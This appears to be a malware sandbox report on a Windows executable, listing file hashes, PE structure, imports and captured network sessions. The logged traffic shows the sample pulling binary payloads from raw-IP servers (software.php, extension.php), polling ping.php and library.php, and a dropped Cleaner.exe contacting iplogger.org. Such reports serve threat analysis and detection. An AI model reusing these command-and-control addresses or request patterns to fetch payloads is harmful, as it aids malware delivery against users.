                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1572864
                                                          Entropy (8bit):4.290715485380085
                                                          Encrypted:false
                                                          SSDEEP:12288:OlW7q5fhEgY2hAFCSH/wl9VDr46aBEcqDXob97n8he1cTGjH3HD/7w6:P7q5fhEgY2hAFCjnv
                                                          MD5:5B9EF849950CAD433973C4131ADA8B70
                                                          SHA1:42FB4DCC45C07666D1C8C7B7A595C935111F8F45
                                                          SHA-256:245B6DCC178CFDA8757782676BBE9EC3B7297FBC3115A5AED7416F3FB68B0539
                                                          SHA-512:6DA9F760E708658EBF852BC9B7A56C594A06031D08ECFDE8DA3BE8F75BC664A1DF8DF88AB6AC05BC7DEA961C5D1EB4A7350FC034F67BB8286B780E130E315E16
                                                          Malicious:false
                                                          Preview:regfr...r...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.p..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.469320228864725
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:238080
                                                          MD5:a3b774ed5023f56970eea0668ae65703
                                                          SHA1:3aebfec7980d1db1edbeccbb29044ea677be304b
                                                          SHA256:f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
                                                          SHA512:98a9ec33206f8074104b2ecb19026cdbbe1a313e8f2be6ab088611c9c2dda1b7aaaf10a610376acbc9c5448076becc4685ef364d78dfbbb2eabfb3ddcf0117f6
                                                          SSDEEP:6144:iV8tR1u52up3sfkVXJYS1Ne/1z0BvEQTEOMEd:iV8trKM87YS1Ne9zY8MEtEd
                                                          TLSH:9034F1723DA08432DC5F74728CB29A453A7FB84222B5594673B81A6DAF337C16E343D6
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....8a...........................
                                                          Icon Hash:3370686868686829
                                                          Entrypoint:0x404bf7
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x613897B6 [Wed Sep 8 11:00:06 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:2d5ec24fb9d2ee4cf8208f9e16125d4f
                                                          Instruction
                                                          call 00007F5CD4CB928Bh
                                                          jmp 00007F5CD4CB5E1Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F5CD4CB5FC6h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F5CD4CB5FF0h
                                                          test ecx, 00000003h
                                                          jne 00007F5CD4CB5F91h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [C++] VS2008 build 21022
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe0fc | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x191000 | 0x4bf8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1210 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2c78 | 0x18 | .text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2c30 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1d8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xdbf6 | 0xdc00 | False | 0.486328125 | data | 5.91189843213956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x181d7c | 0x27600 | False | 0.9501674107142857 | data | 7.869383846999812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x191000 | 0x4bf8 | 0x4c00 | False | 0.5950349506578947 | data | 5.615847517398622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1912b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | |
RT_ICON | 0x191b58 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | |
RT_ICON | 0x194100 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | |
RT_STRING | 0x1953a8 | 0x42 | data | |
RT_STRING | 0x1953f0 | 0x280 | data | |
RT_STRING | 0x195670 | 0x3ce | data | |
RT_STRING | 0x195a40 | 0x1b2 | data | |
RT_ACCELERATOR | 0x1951d8 | 0x80 | data | |
RT_GROUP_ICON | 0x1951a8 | 0x30 | data | |
RT_VERSION | 0x195268 | 0x140 | MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79 | |
None | 0x195258 | 0xa | data | |
DLL | Import
KERNEL32.dll | LoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesW, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindCloseChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, PostQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeA, WriteConsoleOutputW, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, LeaveCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
USER32.dll | CharUpperBuffW
WINHTTP.dll | WinHttpCreateUrl
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2022 17:33:21.442984104 CEST | 49302 | 53 | 192.168.2.3 | 8.8.8.8
Oct 3, 2022 17:33:21.462057114 CEST | 53 | 49302 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2022 17:33:21.442984104 CEST | 192.168.2.3 | 8.8.8.8 | 0x794d | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2022 17:33:21.462057114 CEST | 8.8.8.8 | 192.168.2.3 | 0x794d | No error (0) | iplogger.org | | 148.251.234.83 | A (IP address) | IN (0x0001) | false
                                                          • iplogger.org
                                                          • 208.67.104.97
                                                          • 85.31.46.167
                                                          • 107.182.129.235
                                                          • 171.22.30.106
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49723 | 148.251.234.83 | 443 | C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49713 | 208.67.104.97 | 80 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
Oct 3, 2022 17:32:28.566678047 CEST | 104 | OUT | GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 208.67.104.97
Connection: Keep-Alive
Cache-Control: no-cache
Oct 3, 2022 17:32:30.576921940 CEST | 105 | IN | HTTP/1.1 200 OK
Date: Mon, 03 Oct 2022 15:32:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 30
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49714 | 85.31.46.167 | 80 | C:\Users\user\Desktop\file.exe
Timestamp | kBytes transferred | Direction | Data
Oct 3, 2022 17:32:32.611027956 CEST | 105 | OUT | GET /software.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: D
Host: 85.31.46.167
Connection: Keep-Alive
Cache-Control: no-cache
Oct 3, 2022 17:32:32.641341925 CEST | 107 | IN | HTTP/1.1 200 OK
Date: Mon, 03 Oct 2022 15:32:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="dll";
Content-Transfer-Encoding: binary
Content-Length: 242176
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
Oct 3, 2022 17:32:33.214382887 CEST | 364 | OUT | GET /software.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: E
Host: 85.31.46.167
Connection: Keep-Alive
Cache-Control: no-cache
Oct 3, 2022 17:32:33.246129036 CEST | 365 | IN | HTTP/1.1 200 OK
Date: Mon, 03 Oct 2022 15:32:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="soft";
Content-Transfer-Encoding: binary
Content-Length: 3947920
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          3          | 192.168.2.3 | 49727       | 208.67.104.97  | 80               | C:\Users\user\Desktop\file.exe
                                                          Timestamp                           | kBytes transferred | Direction | Data
                                                          Oct 3, 2022 17:33:56.948786020 CEST | 4929               | OUT       | GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 1
                                                          Host: 208.67.104.97
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:58.858678102 CEST | 4930               | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:56 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                                                          4          | 192.168.2.3 | 49728       | 107.182.129.235 | 80               | C:\Users\user\Desktop\file.exe
                                                          Timestamp                           | kBytes transferred | Direction | Data
                                                          Oct 3, 2022 17:33:58.934958935 CEST | 4930               | OUT       | GET /storage/ping.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 0
                                                          Host: 107.182.129.235
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:58.962400913 CEST | 4931               | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:58 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 17
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                                          Data Ascii: UwUoooIIrwgh24uuU
                                                          Oct 3, 2022 17:33:59.005754948 CEST | 4931               | OUT       | GET /storage/extension.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 1
                                                          Host: 107.182.129.235
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:59.033391953 CEST | 4933               | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:59 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Pragma: public
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Cache-Control: private
                                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                          Content-Transfer-Encoding: binary
                                                          Content-Length: 94224
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: application/octet-stream


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          5          | 192.168.2.3 | 49729       | 171.22.30.106  | 80               | C:\Users\user\Desktop\file.exe
                                                          Timestamp                           | kBytes transferred | Direction | Data
                                                          Oct 3, 2022 17:33:59.198265076 CEST | 5031               | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:33:59.718575001 CEST | 5031               | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:33:59 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:01.759082079 CEST | 5036               | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:02.291836023 CEST | 5036               | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:01 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:04.333590984 CEST | 11728              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:04.853250027 CEST | 11728              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:04 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=98
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:06.938766003 CEST | 12497              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:07.473392963 CEST | 12680              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:06 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=97
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:09.590425968 CEST | 12680              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:10.120043039 CEST | 12681              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:09 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=96
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:13.025736094 CEST | 12682              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:13.562206984 CEST | 12682              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:13 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=95
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:15.658155918 CEST | 12683              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:16.168941021 CEST | 12683              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:15 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=94
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:18.206471920 CEST | 12683              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:18.741888046 CEST | 12684              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:18 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=93
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:20.784324884 CEST | 12684              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:21.340166092 CEST | 12685              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:20 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=92
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:23.377938032 CEST | 12685              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:23.914403915 CEST | 12685              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:23 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=91
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0
                                                          Oct 3, 2022 17:34:25.975308895 CEST | 12686              | OUT       | GET /library.php HTTP/1.1
                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                          User-Agent: 2
                                                          Host: 171.22.30.106
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 3, 2022 17:34:26.502857924 CEST | 12686              | IN        | HTTP/1.1 200 OK
                                                          Date: Mon, 03 Oct 2022 15:34:25 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 1
                                                          Keep-Alive: timeout=5, max=90
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 30
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          0          | 192.168.2.3 | 49723       | 148.251.234.83 | 443              | C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                                                          Timestamp               | kBytes transferred | Direction | Data
                                                          2022-10-03 15:33:22 UTC | 0                  | OUT       | GET /1Pz8p7 HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
                                                          Host: iplogger.org
                                                          Connection: Keep-Alive
                                                          2022-10-03 15:33:22 UTC | 0                  | IN        | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 03 Oct 2022 15:33:22 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
